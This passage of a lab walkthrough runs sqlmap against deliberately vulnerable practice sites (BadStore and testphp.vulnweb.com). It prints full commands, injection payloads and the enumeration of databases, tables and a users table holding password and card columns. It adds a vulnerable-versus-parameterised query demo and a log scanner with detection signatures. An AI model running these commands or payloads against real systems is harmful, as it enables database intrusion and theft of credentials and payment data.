[10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:27:14

The name of the table is itemdb.


D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:29:00

[10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:29:00] [INFO] resuming injection data from session file
[10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file
[10:29:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:29:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common columns existance check? [Y/n/q] y
[10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-columns.txt'
please enter number of threads? [Enter for 1 (current)]
[10:29:05] [WARNING] running in a single-thread mode. This could take a while.
[10:29:36] [INFO] retrieved: price
[10:29:55] [INFO] retrieved: qty
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+

[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:34:18

E) Other databases

As we have seen, there is no table called usuarios or anything like it; only the products table is there, so this way we can get neither users nor passwords. Let's check the other databases, then:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --dbs


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:36:17

[10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:36:17] [INFO] resuming injection data from session file
[10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' from session file
[10:36:17] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:36:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[10:36:18] [INFO] fetching database names
[10:36:18] [INFO] fetching number of databases
[10:36:18] [ERROR] unable to retrieve the number of databases
[10:36:18] [INFO] falling back to current database
[10:36:18] [INFO] fetching current database
[10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session': badstoredb
available databases [1]:
[*] badstoredb

[10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:36:18


4. Acunetix

We enter the site and, browsing around it, in the categories section we see that the URL shows ?cat=1, which is a hint worth checking: http://testphp.vulnweb.com/listproducts.php?cat=1

We go to sqlmap and try:

A) DB server and version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:52:48

[10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[10:52:49] [INFO] testing connection to the target url
[10:52:49] [INFO] testing if the url is stable, wait a few seconds
[10:52:50] [INFO] url is stable
[10:52:50] [INFO] testing if GET parameter 'cat' is dynamic
[10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic
[10:52:51] [INFO] GET parameter 'cat' is dynamic
[10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injectable (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
[10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[10:54:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 10:54:07

El parmetro cat es vulnerable
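To show why sqlmap finds a boolean-based oracle in this parameter, here is an added example written for this page (it is not the vulnweb application's own source, which the report does not show): a Python/SQLite stand-in for the listproducts query. One handler concatenates the raw cat value into the SQL text, the other validates it as an integer and binds it as a parameter. The table, its rows and the false counterpart of the probe are constructed; the true probe is the boolean-based payload sqlmap reported above.

```python
import sqlite3

TRUE_PROBE = "1 AND 4423=4423"    # boolean-based payload sqlmap reported above
FALSE_PROBE = "1 AND 4423=4424"   # constructed false counterpart of the same probe


def make_db():
    """In-memory SQLite stand-in for a products-by-category table.
    Schema and rows are constructed for this example, not the target's data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pictures (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT);
        INSERT INTO pictures VALUES (1, 1, 'Sunset'), (2, 1, 'Harbour'), (3, 2, 'Portrait');
    """)
    return conn


def list_products_vulnerable(conn, cat):
    """The pattern sqlmap exploited: the raw 'cat' value becomes part of the SQL
    text, so an 'AND <condition>' appended by the client changes the result set."""
    sql = "SELECT title FROM pictures WHERE cat=" + cat
    return [row[0] for row in conn.execute(sql)]


def list_products_safe(conn, cat):
    """Hardened form: accept only a decimal category id and bind it as a
    parameter, so the value can never be parsed as SQL."""
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    rows = conn.execute("SELECT title FROM pictures WHERE cat=?", (int(cat),))
    return [row[0] for row in rows]


def oracle_leaks(handler, conn):
    """True when the true and false probes produce different outcomes, i.e. the
    handler hands the client a boolean oracle (sqlmap's 'boolean-based blind')."""
    def outcome(probe):
        try:
            return ("rows", handler(conn, probe))
        except ValueError as exc:
            return ("rejected", str(exc))
    return outcome(TRUE_PROBE) != outcome(FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks oracle:", oracle_leaks(list_products_vulnerable, db))
    print("safe handler leaks oracle:      ", oracle_leaks(list_products_safe, db))
```

The vulnerable handler returns two rows for the true probe and none for the false one, which is exactly the difference sqlmap measures; the hardened handler rejects both probes identically, and the error-based and time-based payloads listed above fail for the same reason once the value can no longer reach the parser as SQL.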


B) DB Name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:15

[11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:52:15] [INFO] resuming injection data from session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[11:52:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:52:16] [INFO] fetching current database
[11:52:18] [INFO] retrieved: acuart
current database: 'acuart'

[11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 11:52:18

C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:54:12

[11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:54:12] [INFO] resuming injection data from session file
[11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:54:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[11:54:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:14] [INFO] the SQL query used returns 7 entries
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: acuart
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+


D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:56:55

[11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:56:55] [INFO] resuming injection data from session file
[11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
[11:56:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] the SQL query used returns 8 entries
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: address
[11:56:58] [INFO] retrieved: mediumtext
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: name
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: phone
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: cart
[11:56:59] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
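Every step in sections A to D sends requests whose query string carries one of the payloads sqlmap lists above, so the whole session leaves a clear trace in the web server's access log. As an added example (not part of the original report), here is a small Python scanner that parses Apache combined-format log lines, URL-decodes each query parameter and flags the boolean-based, error-based, time-based and UNION patterns seen on this page, plus a User-Agent that names sqlmap. The log lines, client addresses, timestamps and response sizes are constructed for the example; the payloads in lines 2 to 4 are the ones sqlmap reported for the cat parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format access-log lines for a hypothetical server.
# Lines 2-4 carry the three injection payloads sqlmap reported for 'cat'.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:52:50 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:52:52 +0000] "GET /listproducts.php?cat=1%20AND%204423%3D4423 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.0.2.10 - - [01/Jan/2024:10:52:52 +0000] "GET /listproducts.php?cat=1%20AND%20(SELECT%20997%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT%20(CASE%20WHEN%20(997%3D997)%20THEN%201%20ELSE%200%20END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 6231 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.0.2.10 - - [01/Jan/2024:10:53:52 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.0.2.77 - - [01/Jan/2024:10:55:01 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
"""

# Apache combined format: client ident user [time] "method url proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"\s*$'
)

# Signatures derived from the injection types sqlmap reports above; each one is
# matched against a single URL-decoded query-string value.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
    ("error-based", re.compile(r"information_schema|FLOOR\s*\(\s*RAND", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\b.{0,40}?\bSELECT\b", re.I)),
]


def classify_value(value):
    """Return the names of every signature that fires on one parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(text):
    """Return one alert per request parameter whose decoded value matches a
    signature, or whose User-Agent names sqlmap. Each alert is a dict with the
    line number, client address, parameter, decoded value and list of reasons."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        query = urlsplit(m.group("url")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if "sqlmap" in m.group("ua").lower():
                reasons.append("scanner user-agent")
            if reasons:
                alerts.append({"line": lineno, "client": m.group("client"),
                               "param": param, "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"line {a['line']}: {a['client']} param={a['param']!r} -> {', '.join(a['reasons'])}")
```

Lines 1 and 5 produce no alert; lines 2, 3 and 4 are flagged as boolean-based, error-based and time-based respectively. Matching on the decoded value is what makes the error-based payload visible, since in the raw log it is hidden behind percent-encoding, and the User-Agent check is a weak secondary signal only: it is trivially changed, so the query-string signatures should be the ones an alert rests on.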
